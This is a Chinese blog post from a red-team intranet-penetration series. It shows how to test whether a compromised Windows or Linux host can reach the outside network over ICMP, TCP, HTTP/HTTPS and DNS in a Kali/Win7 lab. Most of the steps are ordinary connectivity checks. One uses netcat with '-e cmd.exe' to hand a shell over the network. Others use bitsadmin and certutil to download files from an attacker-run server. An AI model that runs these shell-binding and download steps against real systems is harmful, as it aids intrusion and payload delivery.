内网隧道——内网探测出网

已于 2024-07-23 09:47:45 修改
阅读量691 收藏 24
点赞数 17
分类专栏: 内网渗透 文章标签: 网络安全
于 2024-07-22 09:26:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/140566057
版权

文章目录


该部分主要是探测目标主机是否出网,网络拓扑图如下:
在这里插入图片描述
kali:192.168.111.0
win7:192.168.111.128

一、ICMP协议探测出网

ICMP(Internet Control Message Protocol)是一种面向无连接的协议,属于网络层的协议,用于检测网络通信故障和实现链路追踪。

1.1 Windows系统探测ICMP协议出网

(1)ping

ping命令经常用于测试网络连通性,由于该命令是基于ICMP协议来实现的,因此Ping是ICMP出网测试中最常用的命令。

ping www.baidu.com

返回如下图信息,即证明ICMP协议出网探测成功。
在这里插入图片描述

(2)tracert 命令

tracert命令是Windows中用来跟踪路由的命令,它依靠ICMP协议实现,在ICMP出网测试中只需要使用Tracert命令跟踪下目标地址即可。

tracert www.baidu.com

获得下图的返回信息,即证明出网成功。
在这里插入图片描述

1.2 Linux系统探测ICMP协议出网

在Linux系统中探测ICMP协议出网通常可以使用ping命令,但linux系统需要使用-c来指定次数,Windows系统下ping命令执行第4次后会自动停止,linux系统则不会自动停止。

ping -c 4 www.baidu.com

获得下图的返回信息,即证明出网成功。
在这里插入图片描述

二、TCP协议探测出网

2.1 NC工具探测TCP协议出网

目标主机上使用nc监听8888端口,并将shell反弹

nc -lvp 8888 -e cmd.exe
# -l:监听
# -v:显示指令执行过程
# -p <source port>:设置监听端口
# -e cmd.exe:将win7的shell反弹给kali
# 如果是linux主机监听的话,就是:-e /bin/bash

kali使用nc连接win7

nc -nv 192.168.111.128 8888
# -n:直接使用IP地址,而不通过域名服务器
# -v:显示指令执行过程

在这里插入图片描述)
在这里插入图片描述)

成功连接~

2.2 Telnet命令探测TCP协议出网

kali上使用nc监听8888端口

nc -lvp 8888
# -l:监听
# -v:显示指令执行过程
# -p <source port>:设置监听端口

目标主机使用telnet去探测kali的8888端口

telnet 192.168.111.0 8888

结果如下显示,说明通过TCP协议出网。
在这里插入图片描述

三、HTTP/HTTPS协议探测出网

3.1 Windows系统探测HTTP/HTTPS出网

(1) Bitsadmin 命令
Bitsadmin命令在Windows操作系统是用于创建、下载或上传作业,并监视作业进度的命令行工具。可通过该命令行工具测试能否从网站下载文件,以此来检测http或https是否出网

kali上开启http服务:

python3 -m http.server 9999

在这里插入图片描述
win7下使用Bitsadmin命令下载指定文件。

# 使用Bitsadmin命令下载test.php文件,并保存到本地C盘下的test.php中
bitsadmin /rawreturn /transfer down "http://192.168.111.0:9999/test.php" c:\test.php"

type c:\test.php # type:显示文本内容,相当于linux下的cat

如若正常下载,则证明探测出网成功。
在这里插入图片描述
(2)Certuil 命令
Certuil命令是windows操作系统中的一款下载文件的命令行工具,可作为证书服务的安装,用来转储和显示证书颁发机构 (CA) 配置信息,配置证书服务,备份和还原CA组件,以及验证证书、密钥对和证书链。

kali上开启http服务:

python3 -m http.server 9999

在这里插入图片描述
win7下使用certutil下载指定文件。

certutil -urlcache -split -f http://192.168.111.0:9999/test.php c:\t.php

type c:\t.php # type:显示文本内容,相当于linux下的cat

在这里插入图片描述

3.2 Linux系统探测HTTP/HTTPS出网

(1)curl
Curl是Linux自带的命令行工具,用于传输来自服务器或者到服务器的数据。

curl https://www.baidu.com

该命令会显示返回数据包内容

在这里插入图片描述
(2)wget
Wget是Linux下一款命令行下载工具,支持http和ftp协议,支持多种下载模式,一般用于批量下载文件。

# 下载robots.txt
wget https://www.baidu.com/robots.txt

在这里插入图片描述

五、DNS协议探测出网

5.1 Windows系统探测DNS协议出网

在Windows系统中测试DNS协议出网可使用nslookup命令,这是一种网络管理命令行工具,可以用来查询DNS域名和IP解析

nslookup <url> <指定DNS服务器>

在这里插入图片描述

5.2 Linux系统探测DNS协议出网

(1)dig
dig命令在Linux操作系统中用于询问DNS,可以查询DNS协议下的NS记录、A记录、MX记录相关信息

dig @8.8.8.8 www.baidu.com

这里指定DNS服务器,8.8.8.8是Google的DNS服务器。返回响应结果,证明出网成功。

在这里插入图片描述
(2)nslookup
同windows

nslookup <url> <指定DNS服务器>

在这里插入图片描述

PT_silver
关注
专栏目录
出网协议端口探测
谢公子的博客
09-20 1767
出网协议以及出网端口探测
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 455
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
隧道穿透:内网探测协议出网
qq_68163788的博客
02-02 1208
内网探测协议出网通常会利用一些常见的网络协议,如HTTP、DNS、FTP等,通过对这些协议的数据流量进行篡改或伪装,将内网的数据传输到外部网络。这样一来,即使目标网络有防火墙或其他安全设备,也很难检测到这些数据流量的真实目的和内容,从而实现对内网探测或攻击。 为了防范内网探测协议出网,网络管理员可以采取一些措施,如加强对网络协议的识别和过滤、限制内网数据流量的出口、加强对内网数据流量的监控等。同时,也可以利用一些安全设备和技术手段,如入侵检测系统(IDS)、防火墙、代理服务器等,来检测和阻止内网探测协议
《红蓝攻防对抗实战》二.内网探测协议出网之TCP/UDP协议探测出网
热门推荐
一只特立独行的兔先森
10-22 2万+
当红队人员在进行内网渗透时,经常会遇到目标主机不出网的场景,而主机不出网的原因有很多,常见的原因例如目标主机未设置网关,被防火墙或者其他防护设备拦截设置了出入站策略,只允许特定协议或端口出网等。当我们遇到这种情况时,可以通过本章节中所讲到的方法,利用各种包含该协议的方式探测目标主机允许哪些协议出网,根据探测到的协议信息进行隧道穿透。在已经获取到目标系统的权限前提下,可以通过下述所讲到的各种协议探测手段来进行探测是否出网
探索内网的隐形翅膀:netspy - 功能强大的内网探测工具
最新发布
gitblog_00059的博客
05-13 754
探索内网的隐形翅膀:netspy - 功能强大的内网探测工具 去发现同类优质开源项目:https://gitcode.com/ 在网络渗透测试或企业内部安全检查中,快速准确地了解内网结构至关重要。正是在这种需求下,我们发现了netspy —— 一款由深信服深蓝实验室天威战队精心打造的轻量级内网探测工具。凭借其高效、易用和跨平台的特点,netspy成为了专业人员扩大内网可见范围的理想选择。 ???? 项...
网络探测
笑看风云起的专栏
09-16 713
Problem Description When the network runs into trouble, we often use the command “ping” to test whether the computer is well connected to others. For example, if we want to test whether our computer i
网络探测技术
weixin_34239592的博客
01-23 236
1扫描工具: nmap : 如果您的系统用nmap扫描后, 什么都没发现, 说明您的系统足够健壮...SDK26 is OK. 2 TTL TTL值是产生ICMP包的主机的TTL; windownxp ttl: 128 TTL值不同对应不同的操作系统。 TTL=32 Windows 9x/Me TTL=6...
内网安全——域横向内网漫游Socks代理隧道技术
世间繁华梦一出
08-06 588
内网漫游——内网穿透Socks代理技术内网穿透Ngrok测试演示——两个内网通讯上线内网穿透Frp自建跳板测试——两个内网通讯上线CFS三层内网漫游安全测试演练——某CTF线下2019 内网穿透Ngrok测试演示——两个内网通讯上线 Ngrok代理工具的作用就是(如下图)在两个不同内网的主机之间的外网提供一台服务器, 内网穿透Frp自建跳板测试——两个内网通讯上线 CFS三层内网漫游安全测试演练——某CTF线下2019 ...
内网安全-流量隧道(一)不出网CS上线&正反向&端口转发
weixin_45701675的博客
04-16 3486
内网-隧道技术
内网渗透-内网信息搜集
cdyunaq的博客
03-25 1330
前言 当我们能访问到⽬标内⽹任何资源之后,我们就可以对 ⽬标内⽹进⾏更深层次的信息搜集⽐如:主机收集、IP 段搜集、端⼝开放服务、Web 资产数量、漏洞类型。接下来是一些工具的食用姿势,仅供参考。 假设我们已经获取到 web-2012 的权限,接下来如何对内⽹进⾏信息搜集,内⽹扫描。 信息收集 主机存活探测 基于netbios的内网存活主机发现 netbios简介 IBM公司开发,主要用于数十台计算机的小型局域网。该协议是一种在局域网上的程序可以 使用的应用程序编程接口(API),为程序提供了
Ping探测网络连通性
07-07
C#语言写的简单网络探测,运用Ping类,LinQ,数据持久化,线程池等技术,探测IP从数据库读取,并将ECHO结果写入数据库。
一个网络检测非常有用的工具
07-11
这是一个非常好的工具,如果对你有用的话,就赶快拿去用吧
2023年全国职业院校技能大赛GZ073网络系统管理赛项模块A:网络构建卷II——赛题解析+命令配置
君逍遥o
01-11 2005
13.北京综合服务中心内网VLAN40 IPv6终端有访问广域网30.0.0.1地址需求,为此在R2路由器部署NAT-PT实现IPv6地址的动态转换,具体规划内网IPv6地址转换地址池为12.1.1.3-12.1.1.5,30.0.0.1转换为2001:21:1::2。无线用户(认证用户名user1、密码为YY)关联SSID后使用802.1X认证方式,可自动获取VLAN10地址(XX、YY现场提供)。R2、S1、S2间归属区域0,S1、S3间归属区域1,S2、S4间归属区域2。配置AC1为主,AC2为备。
网络探测工具
liudaoru - 悟
09-28 405
  wireshark 还挺好用的,mark一下。。。。   http://www.wireshark.org/download.html
骇客学堂:网络入侵检测初步探测方法
软体疯子专栏
11-15 1053
 经过精心配置的Win2000服务器可以防御90%以上的入侵和渗透,但是,就象上一章结束时所提到的:系统安全是一个连续的过程,随着新漏洞的出现和服务器应用的变化,系统的安全状况也在不断变化着;同时由于攻防是矛盾的统一体,道消魔长和魔消道长也在不断的转换中,因此,再高明的系统管理员也不能保证一台正在提供服务的服务器长时间绝对不被入侵。   所以,安全配置服务器并不是安全工作的[/size]结
网络侦察实验
weixin_58205689的博客
03-30 445
通过crunch和hydra等工具的学习和使用,掌握字典文件的生成、破解密码等常用的漏洞挖掘和利用技术,具备熟练的漏洞挖掘和防攻击能力。利用kali集成的扫描工具nmap,对网络进行探测,收集目标网络存活的主机信息,收集主机开放的服务信息。了解hydra密码爆破工具的基本功能和使用方法,掌握常见的爆破服务和应用的用户名和密码的方法。了解ettercap嗅探工具的基本功能,掌握常见的嗅探相关服务和应用的用户名和密码的方法。在操作机终端中使用上一步破解的远程密码登录目标机,查看目录和文件,获得敏感信息。
网络探测和诊断工具 - traceroute
ixxqq的博客
04-24 5001
一、概要traceroute是Linux和Mac OS等系统默认提供的用于网络诊断和探测最常用的工具,Windows系统提供了一个叫:tracert的工具,和traceroute工具的功能相同。通过IP地址或域名,traceroute能探测数据包从源地址到目的地址之间经过哪些路由器,以及经过每个路由器的耗时。二、traceroute原理2.1 相关名词ICMPICMP全称...
系统渗透与防护——网络探测
m0_60643467的博客
10-06 895
网络探测 网络探测指对计算机网络或DNS服务器进行扫描,获取有效的地址、活动端口号、主机操作系统头型和安全弱点。 常用工具 Nmap、Nessus、OpenVAS、Metasploit Framework 网络探测的应用 网络探测对统计网络行为,保障网络安全、建立网络仿生环境等方面有看重要的意义,主要有以下几个方面应用。 安全评估 远程系统安全评估是一种非常重要的安全防护方法,包括构成网络的路由器、交换机和提供各种应用的服务器以及个人PC,都存在着相当数量的
nmap — 网络探测工具和安全/端口扫描器
一碗烈酒的博客
11-20 1012
简介: Nmap(“网络映射器”)是一个免费的开源(许可) 用于网络发现和安全审计的实用程序。许多系统和网络管理员还发现它对于网络库存、管理服务升级计划以及监控主机或服务正常运行时间等任务很有用。Nmap 以新颖的方式使用原始 IP 数据包来确定网络上可用的主机、这些主机提供的服务(应用程序名称和版本)、它们运行的​​操作系统(和操作系统版本)、数据包过滤器/防火墙的类型正在使用中,以及其他数十种特性。它旨在快速扫描大型网络,但对单个主机也能正常工作。Nmap 运行在所有主要的计算机操作系统上,官方二进制
内网探测工具netspy在Windows平台的应用与说明
- 由于文件的标签包括了“windows”、“内网探测”和“可达网络”,我们可以推断该软件是一个网络探测工具,可能用于检测和诊断局域网或广域网中的各种网络可达性问题。这类工具对于网络管理员来说至关重要,因为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值